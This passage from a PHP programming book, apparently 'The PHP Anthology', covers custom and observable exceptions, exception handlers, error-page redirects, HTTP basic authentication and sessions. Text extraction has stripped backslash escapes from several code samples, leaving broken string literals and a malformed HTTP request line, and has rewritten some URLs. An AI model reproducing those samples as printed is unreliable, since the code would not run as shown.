 class My_Exception extends Exception {} 



An exception that’s defined like this will act as would any other exception, though
it can be type hinted as My_Exception when you’re catching exceptions:

 try

 { 

   ⋮ try some code…
 }

 catch (My_Exception $e)

 {

   ⋮ handle exception…
 } 



The only overrideable methods in the Exception class are __construct and
__toString. If you’re overriding the __construct method, your custom exception
should call parent::__construct to ensure all data in the exception is properly
set:

 class My_Exception extends Exception 

 {

   public function __construct($message = null, $code = 0) 

   {

     parent::__construct($message, $code);

      ⋮ do the rest of the initialization…
   }

 }



Discussion
It’s useful to create exception classes to cover distinct groups of code that may span
more than one class. For instance, if you were creating a suite of input filter classes,
you may want to create a single exception class to cover them; however, if you’re
creating an MVC (Model-View-Controller) suite, you may want a different type of
exception class for each distinct area of the MVC pattern.
254   The PHP Anthology

      Earlier, we mentioned logging and emailing exceptions. Unlike PHP errors, excep­
      tions are not logged, unless they remain uncaught, in which case they are logged
      as E_FATAL errors. Most of the time, you won’t want or need to log exceptions.
      However, some types of exceptions may indicate situations that need attention from
      a developer or sysadmin—for example, your script is unable to connect to a database
      (when PDO throws exceptions, not PHP errors, for instance), a web service is inac­
      cessible, a file or directory is inaccessible (due to permissions, or the fact that it’s
      simply missing), and so on.

      The easy way to handle these situations is to override the exception’s constructor
      to perform the notification task. Here’s a custom exception class called My_Exception
      that calls the error_log function from within the constructor method:

       class My_Exception extends Exception

       {

         public function __construct($message = null, $code = 0)

         {

           parent::__construct($message, $code);

           error_log($this->getTraceAsString(), 3,

               '/tmp/my_exception.log'); 

         }

       } 



      While this is an easy method for performing special error-logging actions when ex­
      ceptions occur, I find that making the exception observable offers even more flexib­
      ility. Consider this usage example:

       Observable_Exception::attach(new Logging_Exception_Observer());

       Observable_Exception::attach(new Emailing_Exception_Observer());


       class Foo_Exception extends Observable_Exception {}


       ⋮ perform some work…
       throw new Foo_Exception('error occurred');



      In this example, I’ve created a base exception class that’s observable, and called it
      Observable_Exception. I’ve attached two observers to this class: one that logs, and
      one that sends email. These observers check the type of the exceptions they observe,
      and use that information to decide whether or not to act.
Error Handling      255

This strategy provides some flexibility in terms of the way exceptions are handled,
without requiring the use of an explicit exception handler. In addition, you can attach
an observer anywhere in your code, which means that you can decide how to handle
any given exception dynamically.

The code that implements observable exceptions is as follows:

                                                   Exception_Observer.class.php (excerpt)

 interface Exception_Observer
 {
   public function update(Observable_Exception $e);
 }



This code defines the interface for exception observers. We’ll implement the
Exception_Observer interface in a custom class in just a minute.

Next, we create the Observable_Exception class by extending the Exception class.
We add a static property—$_observers—to hold an array of Exception_Observer
instances:

                                                 Observable_Exception.class.php (excerpt)

 class Observable_Exception extends Exception
 {
   public static $_observers = array();



Next, a static method is used to attach observers. Type hinting enforces that only
classes of the Exception_Observer type are allowed as observers:

                                                 Observable_Exception.class.php (excerpt)

   public static function attach(Exception_Observer $observer)
   {
     self::$_observers[] = $observer;
   }



We override the constructor method so that when the exception is instantiated all
observers are notified via a call to the notify method:
256   The PHP Anthology

                                                    Observable_Exception.class.php (excerpt)

           public function __construct($message = null, $code = 0)
           {
             parent::__construct($message, $code);
             $this->notify();
           }



      Finally, the notify method loops through the array of observers and calls their
      update methods, passing a self-reference to the Observable_Exception object,
      $this:

                                                    Observable_Exception.class.php (excerpt)

           public function notify()
           {
             foreach (self::$_observers as $observer)
             {
               $observer->update($this);
             }
           }
       }



      Here’s an example of an exception observer:

                                              Logging_Exception_Observer.class.php (excerpt)

       require 'Exception_Observer.class.php';
       require 'Observable_Exception.class.php';
       class Logging_Exception_Observer implements Exception_Observer
       {
         protected $_filename = '/tmp/exception.log';
         public function __construct($filename = null)
         {
           if ((null !== $filename) && is_string($filename))
           {
             $this->_filename = $filename;
           }
         }
         public function update(Observable_Exception $e)
         {
Error Handling      257


     error_log($e->getTraceAsString(), 3, $this->_filename);

   }

 }




This particular implementation of Exception_Observer logs exception information
to a file. If you’re testing this code, make sure you set the $_filename variable to
an appropriate location and filename.

This strategy offers more flexibility than simply handling the logging or reporting
in the constructor method of a custom exception class, or defining an exception
handler function. Firstly, if you build a hierarchy of exception classes deriving from
the Observable_Exception class, you can attach any number of observers to each
type of observable exception, allowing for the customization of the exception envir­
onment at any time without necessitating that changes be made to the actual excep­
tion code. It also means that only the top-level exception class needs to contain any
additional code; all classes that derive from that class can be empty stubs. Finally,
each observer’s update method can use type hinting via PHP’s instanceof operator
to decide whether or not any action needs to be taken.


How do I implement a custom
exception handler with PHP?
A custom handler for PHP errors can be specified using the set_error_handler
function. Exceptions bubble up until they’re caught, but what happens if they’re
not caught? By default, any exception that isn’t caught raises an E_FATAL error. You
could catch this error with a PHP error handler, but is there another way to handle
uncaught exceptions?

Solution
Like PHP errors, exceptions can be handled automatically using a custom exception
handler that’s specified with the set_exception_handler function.

You’d typically implement an exception handler if you wanted your program to
take a particular action for an uncaught exception—for example, you might want
to redirect the user to an error page, or to log or email the exception so the developer
can correct the issue.
258   The PHP Anthology

      The basic approach involves providing a callback to set_exception_handler:

       null|string set_exception_handler(mixed callback)



      Discussion
      Since exception handlers handle any uncaught exception—not exceptions of specific
      types—they’re somewhat easier to implement than error handlers. In this example,
      we create a custom exception-handling class that logs uncaught exceptions to a file,
      and displays a simple error page:

                                                           ExceptionHandler.class.php (excerpt)

       <?php
       class ExceptionHandler
       {
         protected $_exception;
         protected $_logFile = '/tmp/exception.log';
         public function __construct(Exception $e)
         {
           $this->_exception = $e;
         }
         public static function handle(Exception $e)
         {
           $self = new self($e);
           $self->log();
           echo $self;
         }



      The entry point for this exception handler is the static handle method, which in­
      stantiates itself, logs the exception, then displays an error message by echoing itself
      (using the magic __toString method). If you’re testing this code, make sure you
      set the $_logFile variable to an appropriate location and filename.

      This code uses PHP’s error_log function to log the exception backtrace to a file:
Error Handling      259

                                                 ExceptionHandler.class.php (excerpt)

   public function log()
   {
     error_log($this->_exception->getTraceAsString(), 3,
         $this->_logFile);
   }



The __toString implementation below creates a “pretty” error page that’s displayed
when an exception is handled, preventing the display to users of any sensitive in­
formation contained in the exception backtrace:

                                                 ExceptionHandler.class.php (excerpt)

   public function __toString()
   {
     $message =<<<EOH
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
     <title>Error</title>
   </head>
   <body>
     <h1>An error occurred in this application</h1>
     <p>
       An error occurred in this application; please try again. If
       you continue to receive this message, please
       <a href="mailto:webmaster@example.com"
           >contact the webmaster</a>.
     </p>
   </body>
 </html>
 EOH;
     return $message;
   }
 }



Finally, we tell PHP we want to handle exceptions using
ExceptionHandler::handle:


 set_exception_handler(array('ExceptionHandler', 'handle'));
260   The PHP Anthology

      And we’re done!


      How can I handle PHP

      errors as if they were exceptions?

      Perhaps you prefer exceptions to PHP errors, and want to handle fatal or environ­
      mental PHP errors as if they were exceptions. No problem!

      Solution
      This task is relatively simple. We need to create a custom exception class and, to
      handle errors, we must add a public static method that throws an exception—that
      is to say, creates an instance of itself:

                                                        ErrorToException.class.php (excerpt)

       class ErrorToException extends Exception
       {
         public static function handle($errno, $errstr)
         {
           throw new self($errstr, $errno);
         }
       }



      This class does not need to extend Exception in particular—just an Exception-de­
      rived class. You could, for instance, extend the Observable_Exception from “How
      do I create a custom Exception class?”.

      You won’t want to handle all PHP errors this way, though—E_NOTICEs and E_STRICTs
      don’t justify such handling. Fortunately, set_error_handler takes an error level
      as its second argument:

       set_error_handler(

           array('ErrorToException', 'handle'), 

           E_USER_ERROR | E_WARNING | E_USER_WARNING

       ); 



      The example code above dictates that only warnings and user errors will be thrown
      as exceptions.
Error Handling      261


Discussion
While handling PHP errors as exceptions could be achieved even more simply using
a function, rather than a static method, the approach I’ve explained here has several
advantages. First, it allows you to type hint for these particular exceptions. Second,
the exception class above could extend another custom exception class that provides
additional functionality, such as the ability to log or mail exception information.


How do I display errors
and exceptions gracefully?
You’ve taken heed of the advice to turn off display_errors on your production
servers so that you don’t accidentally expose sensitive system information to users
(and potentially hackers). If you’re not going to display errors, you’ll need to display
something else instead. But how can you make this happen?

Solution
The solution to this common problem is to build the functionality into your error
or exception handler.

Displaying errors from an error or exception handler is a fairly trivial task, although
you may need to take into consideration whether or not the error is fatal, and
whether or not output buffering is being used.

Since exception handlers are only triggered in the event of an uncaught exception,
you can assume a fatal error when working with an exception handler; an example
of an exception handler was shown in “How do I implement a custom exception
handler with PHP?”. When you’re handling errors, however, you’ll need to check
the error level of each error—you may want to display errors at some error levels,
and not others, for example. The error-level checking can be done by testing the
error level in your error handler, or by passing a second argument to
set_error_handler to define which error levels the error handler should accom­
modate.

As for output buffering, we simply need to check the return value of ob_get_level.
If that function returns zero, no output buffering is currently activated and we may
262   The PHP Anthology

      proceed; otherwise, we need to clean out all output buffers, which we can achieve
      easily by nesting an ob_end_clean call in a while loop:

       while (@ob_end_clean()); 



      We need to use the error suppression operator, @, in this case, because the function
      throws an E_NOTICE when it runs out of buffers to clean.

      Let’s put together all the pieces, trapping what we deem fatal errors and throwing
      them as exceptions, and then implementing an exception handler that displays an
      error page, taking into consideration any output buffering that may be in process:

                                                                safeErrorDisplay.php (excerpt)

       class ErrorToException extends Exception
       {
         public static function handle($errno, $errstr)
         {
           throw new self($errstr, $errno);
         }
       }
       set_error_handler(
           array('ErrorToException', 'handle'),
           E_USER_ERROR | E_WARNING | E_USER_WARNING
       );



      The code above defines a class that can be used as a PHP error handler. It simply
      throws itself as an exception. Here, I’ve set it to handle error types of E_USER_ERROR,
      E_WARNING, and E_USER_WARNING, all of which are errors that can be caught, and are
      likely indications that something’s seriously askew in the script.

      Next, let’s define our ExceptionHandler class:

                                                                safeErrorDisplay.php (excerpt)

       class ExceptionHandler
       {
         protected $_exception;
         protected $_logFile = '/tmp/exception.log';
         public function __construct(Exception $e)
         {
Error Handling      263


     $this->_exception = $e;

   }

   public static function handle(Exception $e)

   {

     $self = new self($e);

     $self->log();

     while (@ob_end_clean());

     ob_start();

     echo $self;

     ob_end_flush();

   }




So far, we’ve defined a class with a static handle method that accepts an exception
as its sole argument. The method instantiates itself, logs the exception, then generates
an error message. Before generating the error message, it clears out all output buffers
to ensure that the error message is the only output returned.

Let’s turn to the details of logging and output generation:

                                                           safeErrorDisplay.php (excerpt)

   public function log()
   {
     error_log($this->_exception->getTraceAsString(), 3,
         $this->_logFile);
   }



Logging is undertaken with PHP’s own error_log function. This approach is safe,
it won’t generate errors itself, and it’s simple to use. If you’re testing this code, be
sure to put the appropriate path and filename in the $_logFile variable.

Next, we implement a __toString method:

                                                           safeErrorDisplay.php (excerpt)

   public function __toString()
   {
     $message =<<<EOH
 <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
264   The PHP Anthology


         <head>

           <title>Error</title>

         </head>

         <body>

           <h1>An error occurred in this application</h1>

           <p>

             An error occurred in this application; please try again. If 

             you continue to receive this message, please 

             <a href="mailto:webmaster@example.com"

                 >contact the webmaster</a>.

           </p>

         </body>

       </html>

       EOH;

           return $message;

         }

       }




      That code should look familiar—it’s similar to the solution in “How do I implement
      a custom exception handler with PHP?”. Our ExceptionHandler class has a
      __toString method that uses a heredoc to generate XHTML output. The method
      could be modified to show details of the exception, such as the message or backtrace,
      but that practice is discouraged in the production environment.

      Finally, of course, we define ExceptionHandler::handle() as the exception
      handler:

                                                               safeErrorDisplay.php (excerpt)

       set_exception_handler(array('ExceptionHandler', 'handle'));



      Discussion
      The solution I’ve presented here achieves two goals: it throws severe PHP errors as
      exceptions, and uses an exception handler to log the issues, which generates and
      displays a generic error page for the user.

      Utilizing this solution is a good practice for production systems, as it allows you
      to keep track of site errors while generating a safe display for the end user.
Error Handling     265

Unfortunately, this solution has one drawback: it doesn’t prevent users from refresh­
ing the page and triggering the error condition again. Quite often, if a serious error
occurred, you may not want to keep the page that handles the error display code in
the same environment as the page on which the error was triggered. In fact, there
may be reasons why displaying an error page under these circumstances might fail
completely (including a lack of database connectivity, bad permissions on template
files, and so on). Additionally, if the user clicks on the browser’s Refresh button to
see if the error occurs again, they’ll likely just perpetuate the problem. Finally,
building the display HTML into a class can have a number of downsides—for in­
stance, being completely separate from the site template and style sheets, it may
not match your site’s look and feel. As such, you may want to consider redirecting
users to an error page, instead of simply displaying an error page.


How do I redirect users to another
page following an error condition?
So, you’ve got error and exception handlers in place, tried having them display error
pages, and you’re now worried about what will happen when a user refreshes the
page. As an example, imagine this scenario: a database connectivity issue causes
your site’s homepage to display an error page, and now hundreds or thousands of
incoming users are clicking their Refresh buttons.

It may be time to redirect them to an error page instead.

Solution
For this method to work, you’ll need to ensure that output buffering is on, so that
no headers are sent to the browser prior to the redirect header being sent. The fol­
lowing sample should serve as a guideline:

 class ExceptionRedirectHandler

 {

   protected $_exception;

   protected $_logFile = '/tmp/exception.log';

   public $redirect = 'http://www.example.com/error';

   public function __construct(Exception $e)

   {

     $this->_exception = $e;

   }
266   The PHP Anthology


         public static function handle(Exception $e)

         {

           $self = new self($e);

           $self->log();

           while (@ob_end_clean());

           header('HTTP/1.1 307 Temporary Redirect');

           header("Cache-Control: no-cache, must-revalidate");

           header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");

           header('Location: ' . $self->redirect);

           exit(1);

         }



      As its name implies, ExceptionHandler::handle will be used as an exception
      handler. It instantiates itself, logs the exception, clears the output buffer, and then
      redirects to the page indicated in the $redirect property. Several other HTTP
      headers are specified as well.

      We output a HTTP status code of 307, which indicates to the browser that the redirect
      is only temporary. Additionally, Cache-Control and Expires are set in such a way
      that any subsequent visit to the page will force the browser to refresh the con­
      tent—and with any luck, display the intended content instead of an error.

      Logging is implemented using PHP’s error_log, to which we specify a file argument:

         public function log()

         {

           error_log(

               $this->_exception->getTraceAsString(), 

               3, 

               $this->_logFile

           );

         }

       }



      The actual message that’s logged is the exception’s backtrace. If you’re testing this
      code, be sure to put the appropriate path and filename in the $_logFile property.

      And the final step, of course, tells PHP that our class’s static method will be handling
      the exceptions:

       set_exception_handler(array('ExceptionRedirectHandler', 'handle'));
Error Handling      267


Discussion
When it’s combined with the solution shown in “How can I handle PHP errors as
if they were exceptions?”, the strategy I’ve outlined here will allow you to handle
PHP errors and exceptions gracefully, and to prevent issues associated with re-
propagating the conditions when users accidentally—or deliberately—refresh the
page. By redirecting users, you can ensure that if they refresh the page, they’ll remain
on the same error page. You can even take such steps as setting a session cookie to
prevent them from going back to the offending page, if you wish.

If you use this method, I recommend that you redirect your application’s users to
a page that loads a minimal amount of code—perhaps even a static page—to avoid
the situation in which environmental errors, such as database connectivity or tem­
plate directory permissions, prevent error display. Regardless of what else the error
page displays, it should provide, as a minimum, the basic navigational elements
found on the rest of your site.


Summary
In this chapter, we took a look at the variety of options PHP offers for error handling.
PHP’s error level constants were discussed, as was the behavior you can expect
each level to emit. We then turned to look at the built-in mechanisms that PHP offers
for handling error conditions automatically: the mechanisms we reviewed included
displaying and logging errors. Since PHP offers standard mechanisms for error
handling, you may want to be able to trigger errors of your own—a topic that was
discussed in detail. While error handling can be automated through the PHP inter­
preter itself, sometimes it’s useful to be able to handle errors yourself, so that you
can undertake such tasks as logging, recovery, and more; to this end, we discussed
how to write and use custom error handlers.

PHP 5 introduced a new error mechanism in the form of exceptions. All PHP 5 ex­
ceptions derive from a single internal class called Exception. We discussed how
exceptions bubble up through the code until they’re caught, and investigated the
use of try {…} catch (Exception $e) {…} blocks for this purpose. Additionally,
we created an exception handler to handle uncaught exceptions.
268   The PHP Anthology

      Since exceptions are so easy to deal with, and since they allow code flow to continue
      from the point at which they’re caught, you may want to throw your PHP errors as
      exceptions, as I explained in this chapter.

      Finally, we saw how easy it is, after an error or exception is handled, to display
      graceful error pages that avoid presenting sensitive system information to your
      users. An alternative—redirecting the users to an error page—was also discussed.

      This chapter has provided a solid grounding to help you develop a professional
      approach to managing errors in your PHP scripts. But don’t stop there! The PHP
      manual has even more information to help you as you improve your PHP practices.
10
                                  Chapter




Access Control
One of the realities of building your site with PHP, as opposed to plain old HTML,
is that you build dynamic web pages rather than static web pages. Making the choice
to develop your site with PHP will allow you to achieve results that aren’t possible
with plain HTML. But, as the saying goes, with great power comes great responsib­
ility. How can you ensure that only you, or those to whom you give permission, are
able to view and interact with your web site, while it remains safe from the Internet’s
evil hordes as they run riot, spy on private information, or delete data?

In this chapter, we’ll look at the mechanisms you can employ with PHP to build
authentication systems and control access to your site. I can’t stress enough the
importance of a little healthy paranoia in building web-based applications. The
SitePoint Forums frequently receive visits from unhappy web site developers who
have had their fingers burned when it came to the security of their sites.


       Data Transmission Over the Web is Insecure
      Before we go any further into discussing any specific site security topics, you
      must be aware that any system you build that involves the transfer of data from
      a web page over the Internet will send that information in clear text by default
270   The PHP Anthology

          (unless you’re using HTTPS, which encrypts the data). This potentially enables
          someone to “listen in” on the network between the client’s web browser and the
          web server; with the help of a tool known as a packet sniffer, they’ll be able to
          read the username and password sent via your form, for example. The chance of
          this risk eventuating is fairly small, as typically only trusted organizations like
          ISPs have the access required to intercept packets; however, it is a risk, and it’s
          one you should take seriously.



            About the Examples in this Chapter
          Before we dive in, I need to let you know about the example solutions discussed
          in this chapter.

          The example classes in some of these solutions require the use of a configuration
          file: access_control.ini. This file is used to store various database table names and
          column names used in the examples. Since not everyone names their database
          tables in the same way, configuration values like these are often intended to be
          customizable. The access_control.ini file is read into an array using the PHP
          parse_ini_file function (you can read more about this technique in “How do
          I store configuration information in a file?” in Chapter 6). The configuration file
          looks like this:

                                                                  access_control.ini (excerpt)

            ; Access Control Settings


            ;web form variables e.g. $_POST['login']

            [login_vars]

            login=login

            password=password

            ⋮ more settings follow…



          When an example uses configuration information from this file, that will be indic­
          ated within the section.

          Similarly, the solutions below assume a certain database configuration. The SQL
          details relevant to each solution are indicated in the text where appropriate.

          If you’ve downloaded the code archive for this book from the SitePoint web site,
          you’ll find a file called access_control_dump.sql in the folder for this chapter. You
          can use this file to create the database and insert some sample data. Using this
Access Control   271

       file is identical to using the world database in Chapter 2. The instructions found
       at http://dev.mysql.com/doc/world-setup/en/world-setup.html can be used to
       create the access_control database too, like so:


        command prompt> mysql -u root -p
        mysql> CREATE DATABASE access_control;
        mysql> USE access_control;
        mysql> SOURCE access_control_dump.sql;


       Of course, you’ll have to add the missing path and password information as ap­
       propriate for your system.

       Finally, all these solutions use the PDO class to make the connection to the data­
       base. For more information about using the PDO class, see Chapter 2. All the
       solutions involving web page forms use the PEAR HTML_QuickForm package.
       You can read more about using this package in “How do I build HTML forms with
       PHP?” in Chapter 5.



How do I use HTTP authentication?

Hypertext Transfer Protocol, or HTTP—the transfer protocol used to send web
pages over the Internet to your web browser—defines its own authentication
mechanisms. These mechanisms, basic and digest authentication, are explained in
RFC 2617.1 If you run PHP on an Apache server, you can take advantage of these
mechanisms—digest is available from PHP version 5.1.0—using PHP’s header
function and a couple of predefined variables. A general discussion of these features
is provided in the Features section of The PHP Manual.2


        HTTP Authentication and Apache
       If you wish to use HTTP authentication on your web site, you can set it up using
       only the Apache configuration settings—PHP is not required. For more information
       on how to do this, see the Apache documentation for your server version.3




1
  http://www.ietf.org/rfc/rfc2617
2
  http://www.php.net/manual/en/features.http-auth.php
3
  For example, the documentation for version 2.2 can be found at
http://httpd.apache.org/docs/2.2/howto/auth.html.
272   The PHP Anthology


      Solution
      Let’s step through a simple example page that uses the $_SERVER['PHP_AUTH_USER']
      and $_SERVER['PHP_AUTH_PW'] automatic global variables and the WWW-Authenticate
      HTTP header to protect itself—if the current user is not in a list of allowed users,
      access is denied.

      First, we need a list of valid usernames and passwords. For the purpose of this
      simple demonstration, we’ll just use an array, but this would not be advisable for
      a real-world situation where you’d likely use a database (which we’ll see in “How
      do I build a registration system?”). Here’s the $users array:

                                                                    httpAuth.php (excerpt)

       <?php
       $users = array(
         'jackbenimble' => 'sekret',
         'littlepig' => 'chinny'
       );



      Next, we test for the presence of the automatic global variable
      $_SERVER['PHP_AUTH_USER']. If the variable is not set, a username hasn’t been
      submitted and we need to make an appropriate response—a HTTP/1.1 401 Unau­
      thorized response code, as well as a second header to indicate that we require basic
      authentication using the WWW-Authenticate header:

                                                                    httpAuth.php (excerpt)

       if (!isset($_SERVER['PHP_AUTH_USER']))
       {
         header('HTTP/1.1 401 Unauthorized');
         header('WWW-Authenticate: Basic realm="PHP Secured"');
         exit('This page requires authentication');
       }



      If a username has been submitted, we need to check that the username exists in our
      list of valid usernames, then ensure that the submitted password matches the one
      associated with the username in our list:
Access Control   273

                                                              httpAuth.php (excerpt)

 if (!isset($users[$_SERVER['PHP_AUTH_USER']]))
 {
   header('HTTP/1.1 401 Unauthorized');
   header('WWW-Authenticate: Basic realm="PHP Secured"');
   exit('Unauthorized!');
 }

 if ($users[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW'])
 {
   header('HTTP/1.1 401 Unauthorized');
   header('WWW-Authenticate: Basic realm="PHP Secured"');
   exit('Unauthorized!');
 }



Finally, if all our checks pass muster, we can proceed to display the web page. In
this example, we simply display the credentials we’ve received from the authentic­
ation form. Of course, this output is for demonstration purposes only—you’d never
do this in a real situation:

                                                              httpAuth.php (excerpt)

 echo 'You're in ! Your credentials were:<br />';
 echo 'Username: ' . $_SERVER['PHP_AUTH_USER'] . '<br />';
 echo 'Password: ' . $_SERVER['PHP_AUTH_PW'];
 ?>



Discussion
To understand how HTTP authentication works, you must first understand what
actually happens when your browser sends a web page request to a web server.
HTTP is the protocol for communication between a browser and a web server. When
your browser sends a request to a web server, it uses an HTTP request to tell the
server which page it wants. The server then replies with an HTTP response that
describes the type and characteristics of the document being sent, then delivers the
document itself.

For example, a client might send the following request to a server:
274   The PHP Anthology


          GET /subcat/98 HTTP/1.1

          Host: www.sitepoint.com



      Here’s what it might receive from the server in return:

          HTTP/1.1 200 OK Date: Sat, 24 Mar 2007 08:12:44 GMT

          Server: Apache/2.0.46 (Red Hat)

          X-Powered-By: PHP/4.3.11

          Transfer-Encoding: chunked

          Content-Type: text/html; charset=ISO-8859-1


          <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"

          "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

          <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

            <head>

              <title>PHP &amp; MySQL Tutorials</title>

          ⋮ and so on…


      If you’d like to see this process in action, the next example will give you the chance,
      as we open a connection to www.sitepoint.com and request /subcat/98.4 The ex­
      ample script will read the response from the server and output the complete HTTP
      response for you:

                                                                                            seeHeaders.php

          <?php
          // Connect to sitepoint.com
          $fp = fsockopen('www.sitepoint.com', '80');

          // Send the request
          fputs($fp,
              "GET /subcat/98 HTTP/1.1rnHost: www.sitepoint.comrnrn");

          // Fetch the response
          $response = '';
          while (!feof($fp))
          {
            $response .= fgets($fp, 128);
          }


      4
          We use sockets in the next example to illustrate the passing of the HTTP headers. You can use any of
      a multitude of alternative methods to get the contents of the page itself, from file_get_contents
      to fopen, fread, and fclose. For more information, see Chapter 6.
Access Control   275


 fclose($fp);


 // Convert HTML to entities

 $response = htmlspecialchars($response);


 // Display the response

 echo nl2br($response);

 ?>




Authentication headers are additional headers sent by a server to instruct the browser
that it must send a valid username and password in order to view the page.

In response to a normal request for a page secured with basic HTTP authentication,
a server might respond with headers like these:

 HTTP/1.1 401 Authorization Required

 Date: Tue, 25 Feb 2003 15:41:54 GMT

 Server: Apache/1.3.27 (Unix) PHP/4.3.1

 X-Powered-By: PHP/4.3.1

 WWW-Authenticate: Basic realm="PHP Secured"

 Connection: close

 Content-Type: text/html



No further information is sent, but notice the status code HTTP/1.1 401 Authorization
Required and the WWW-Authenticate header. Together, these HTTP request elements
indicate that the page is protected by HTTP authentication, and isn’t available to
an unauthorized user. A visitor’s browser can convey this information in a variety
of ways, but usually the user will see a small popup like that shown in Figure 10.1.




                         Figure 10.1. The Authentication Required dialog
276   The PHP Anthology

      The dialog prompts site visitors to enter their usernames and passwords. After vis­
      itors using Internet Explorer have entered these login details incorrectly three times,
      the browser displays the “Unauthorized” message instead of displaying the prompt
      again. In other browsers, such as Opera, users may be able to continue to try to log
      in indefinitely.

      Notice that the realm value specified in the WWW-Authenticate header is displayed
      in the dialog. A realm is a security space or zone within which a particular set of
      login details are valid. Upon successful authentication, the browser will remember
      the correct username and password combination, and automatically resend any
      future request to that realm. When the user navigates to another realm, however,
      the browser displays a fresh prompt once again.

      In any case, the user must provide a username and password to access the page.
      The browser sends those credentials with a second page request like this:

          GET /admin/ HTTP/1.1

          Host: www.sitepoint.com

          Authorization: Basic jTSAbT766yN0hGjUi



      The Authorization header contains the username and password encoded with
      base64 encoding which, it’s worth noting, isn’t secure—it’s unreadable for humans,
      but it’s a trivial task to convert base64-encoded values back to the original text.

      The server will check to ensure that the credentials are valid. If they’re not, the
      server will send the HTTP/1.1 401 Authorization Required response again, as shown
      previously. If the credentials are valid, the server will send the requested page as
      normal.

      A package you should consider if you expect to use the HTTP Authentication a lot
      is the HTTP_Auth package available from PEAR.5 HTTP_Auth provides an easy-to­
      use API so that you don’t have to worry about handling the header calls yourself.


                 Sending Headers
               In PHP, the moment your script outputs anything that’s meant for display, the
               web server finishes sending the headers and begins to send the content itself. You


      5
          You can view the package’s information at http://pear.php.net/Auth_HTTP/.
Access Control   277

      cannot send further HTTP headers once the output of the body of the HTTP mes­
      sage—the web page itself—has commenced. If you do use the header or
      session_start functions after the rendering of the body has begun, you’ll see
      an error message like this:


       Warning: Cannot add header information - headers already
       sent by (output started at…


      Remember, any text or whitespace outside the <?php … ?> tags causes output
      to be sent to the browser. If you have whitespace before a <?php tag or after a ?>
      tag, you won’t be able to send headers to the browser beyond that point.



How do I use sessions?

Sessions are a mechanism that allows PHP to preserve state between executions.
In simple terms, sessions allow you to store variables from one page—the state of
that page—and use them on another. For example, if a visitor submits his first name,
Bob, via a form on your site, sessions will allow your site to remember his name,
and allow you to place personal messages such as “Where would you like to go
today, Bob?” on all the other pages of your site for the duration of his visit. Don’t
be surprised if Bob leaves rather quickly, though!

The basic mechanism of sessions works like this: first, PHP generates a unique, 32­
character string to identify the session. PHP then passes the value to the browser;
simultaneously, it creates a file on the server and includes the session ID in the fi­
lename. There are two methods by which PHP can keep track of the session ID: it
can add the ID to the query string of all relative links on the page, or send the ID as
a cookie. Within the file that’s stored on the server, PHP saves the names and values
of the variables it’s been told to store for the session.

When the browser makes a request for another page, it tells PHP which session it
was assigned via the URL query string, or by returning the cookie. PHP then looks
up the file it created when the session was started, and so has access to the data
stored within the session.

Once the session has been established, it’ll continue until it’s specifically destroyed
by PHP (in response to a user clicking Log out, for example), or the session has been
inactive for longer than a given period of time (as specified in your php.ini file under
278   The PHP Anthology

      session.gc_maxlifetime). At this point it becomes flagged for garbage collection
      and will be deleted the next time PHP checks for outdated sessions.

      Solution
      Here’s a very simple demonstration of storing and retrieving a session variable:

                                                                             simpleSession.php

       <?php
       session_start();
       // If session variable doesn't exist, register it
       if (!isset($_SESSION['test']))
       {
         $_SESSION['test'] = 'Hello World!';
         echo '$_SESSION['test'] is registered.<br />' .
             'Please refresh page';
       }
       else
       {
         // It's registered so display it
         echo '$_SESSION['test'] = ' . $_SESSION['test'];
       }
       ?>



      The script registers the session variable test the first time the page is displayed.
      The next time (and all times thereafter, until the session times out through inactivity),
      the script will display the value of the test session variable.

      Discussion
      In general, sessions are easy to use and powerful—they’re an essential tool for
      building online applications. The first order of business in a script that uses sessions
      is to call session_start to load any existing session variables.

      You should always access session variables via the predefined global variable
      $_SESSION, not the functions session_register and session_unregister.
      session_register and session_unregister fail to work correctly when PHP’s
      register_globals setting has been disabled, which should always be the case.

      In the following HTTP response headers, a server passes a session cookie to a browser
      as a result of the session_start function in a PHP script:
Access Control   279


    HTTP/1.1 200 OK

    Date: Wed, 26 Feb 2003 02:23:08 GMT

    Server: Apache/1.3.27 (Unix) PHP/4.3.1

    X-Powered-By: PHP/4.3.1

    Set-Cookie: PHPSESSID=ce558537fb4aefe349bb8d48c5dcc6d3; path=/

    Connection: close

    Content-Type: text/html


    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"

    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

    <html xmlns="http://www.w3.org/1999/xhtml">

    ⋮ and so on…



          Storing Sessions Elsewhere
         Notice that I’ve said sessions are stored, by default, on the server as files. It’s also
         possible to store sessions elsewhere, such as in a database or even shared memory.
         We’ll discuss creating a custom session handler for saving the session variables
         to a database in “How do I store sessions in a database?”. Storing sessions in
         database can be useful for displaying “who’s online” information, and for load-
         balancing multiple web servers using a single-session repository—a mechanism
         that allows visitors to (unknowingly) swap servers while their session is main­
         tained.



          Sessions Aren’t Perfect
         While sessions are a wonderful tool, they can easily cause headaches if you don’t
         understand their limitations. Take care when you handle data that’s relevant to
         the session state. For example, when users open multiple windows for a site, a
         script executed in one window may overwrite data saved from another, rolling
         back a user to an earlier state in the site. Also be aware that resource handles and
         references are not saved with an object in the session—you need to release and
         recreate them in the __sleep and __wakeup methods of your classes.6 Also, try
         to keep the amount of data in the session variables to a minimum, as pulling large
         chunks of data that aren’t used for every page may slow the pages down.




6
    __sleep and __wakeup are examples of magic methods, and are explained at
